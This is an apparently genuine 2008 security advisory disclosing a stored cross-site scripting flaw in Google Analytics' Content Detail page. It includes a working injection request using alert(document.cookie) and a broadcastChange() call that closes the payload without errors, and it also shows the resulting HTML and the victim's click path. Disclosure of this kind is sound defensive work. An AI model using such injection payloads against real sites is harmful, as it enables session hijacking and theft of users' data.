December 8, 2008

Security advisory

===============================================
=================
= Google Analytics - Stored Cross Site Scripting Vulnerability
=
= Vendor Website:
= http://www.google.com
=
= Affected Version:
= -- http://www.google.com/analytics/
=
= Public disclosure on 8th December 2008
=
===============================================
==================
Available online at:
http://www.security-assessment.com/files/advisories/20
08-12-08_Google_Analytics_Stored_Cross_Site_Scripting.
pdf

== Issue Details ==

Security-Assessment.com recently conducted a security review of the Google Analytics service, provided by Google Inc. Analysis discovered a stored Cross Site Scripting (XSS) vulnerability present in the Analytics web application. A malicious user is able to inject arbitrary browser content through web sites subscribed to the Google Analytics service. The script content injected was rendered into the Google Analytics Content Detail page which uses an Ajax-based menu to list the URL and the number of page views of the visited pages.

The following URL points to the Google Analytics Content Detail page:

URL:
https://www.google.com/analytics/reporting/content_det ail

JavaScript Vulnerable:
goog.analytics.PropertyManager._getInstance()._broadca stChange()

== Exploit Description - Attacker ==

A malicious user visits site xxx.com which is subscribed to the Google Analytics service and employs
the Google Analytics JavaScript tracking code. The attacker performs the following request which includes
the Cross Site Scripting payload and the Google Analytics JavaScript function broadcastChange():

Malicious GET Request:

http://xxx.com/search.asp?keyword=test");
alert(document.cookie);
goog.analytics.PropertyManager._getInstance()._broadca
stChange("drilldown","/search.asp?keyword=test")

In the example above, the broadcastChange function is used to terminate the malicious payload injection and to make the victim’s browser execute the malicious script with no errors.

The web server responds with HTTP Status 200. The URL of the page requested and the Cross Site Scripting payload is passed to the Google Analytics service through the JavaScript tracking code.

The injected script content results as the following HTML being generated by the Google Analytics Content
Detail page:

<a title='/search.asp?keyword=test");
alert(document.cookie);
goog.analytics.PropertyManager._getInstance()._broadca
stChange("drilldown","/search.asp?keyword=test'
href='javascript:goog.analytics.PropertyManager._getIn
stance()._broadcastChange
("drilldown","/search.asp?keyword=test");
alert(document.cookie);
goog.analytics.PropertyManager._getInstance()._broadca
stChange("drilldown","/search.asp?keyword=test")'>
/search.asp?keyword=test"); alert(document.cookie);
goog.analytics.PropertyManager._getInstance()._broadca
stChange("drilldown","/search.asp?keyword=test</a>

== Exploit Description - Victim ==

The victim logs into Google Analytics service. The login page redirects the user to:

https://www.google.com/analytics/settings/

The user clicks on the View Reports for its website (which was attacked with the injection described
above).
The user is redirected to a similar URL:

https://www.google.com/analytics/reporting/?reset=1&id
=xxxxxxx&scid=yyyyyyy

The user accesses the Content Overview section and clicks on one of the listed pages. The user is then
redirected to a similar URL (in this example, the user clicked on index.html):

https://www.google.com/analytics/reporting/content_det
ail?id=xxxxxxx&pdr=20080726-20080825&cmp=average&d1=%2
Findex.html

In the Content Detail page for index.html, an Ajax-based menu lists the most visited pages and their
relative page views.

When the user clicks on the link of the page which was attacked, the browser executes the injected payload from the google.com domain.

Eventually, the user is redirected to the Content Detail page for the search.asp?keyword=test entry. No
JavaScript errors are returned to the JavaScript console.

== Impact ==

Cross Site Scripting attacks can be used in combination with a browser exploitation framework such
as BeEF, Browser Rider, Metasploit browser exploits, Backweb, Anehta, XSS Proxy and Backframe. These frameworks allow for complex JavaScript and browser-based exploit development.

Other potential impacts include:

* Hijacking users browser session;
* Capturing sensitive information viewed by Google
Analytics users;
* Defacement of the Google Analytics website;
* Port scanning of internal user hosts;
* Directed delivery of additional browser-based
exploits, such as ActiveX or URI handler exploits

== Credit ==

Discovered and advised to Google Inc.
August 2008 by Roberto Suggi Liverani of Security-Assessment.com
Personal Page: http://malerisch.net

== Greetings ==

Hello SA guys,
Really L00king forward 'Hacking In The Sun'!!! ;-)

Share - permalink - Comment/Contact me